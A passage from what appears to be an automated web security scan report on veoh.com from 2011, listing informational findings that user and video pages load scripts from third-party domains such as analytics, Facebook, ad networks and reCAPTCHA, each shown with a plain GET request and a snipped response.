8.65. http://www.veoh.com/users/JDFox5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/JDFox5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/JDFox5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 33281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769621"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.66. http://www.veoh.com/users/MitchRider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/MitchRider

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/MitchRider HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 35062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769620"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.67. http://www.veoh.com/users/Veoh-Action-Anime  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Action-Anime

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Action-Anime HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 33392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769611"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.68. http://www.veoh.com/users/Veoh-Horror-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Horror-Movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Horror-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 32667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769612"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.69. http://www.veoh.com/users/Veoh-Upcoming-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Upcoming-Movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Upcoming-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=44
Content-Length: 31732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769625"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.70. http://www.veoh.com/users/bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/bunny12344

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=52
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769623"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.71. http://www.veoh.com/users/tonysurfs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/tonysurfs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/tonysurfs HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=1
Content-Length: 33325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769613"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.72. http://www.veoh.com/veohtv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /veohtv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /veohtv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 26797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.73. http://www.veoh.com/video/conduit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/conduit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/conduit HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.74. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.75. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/share/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=76
Content-Length: 31809

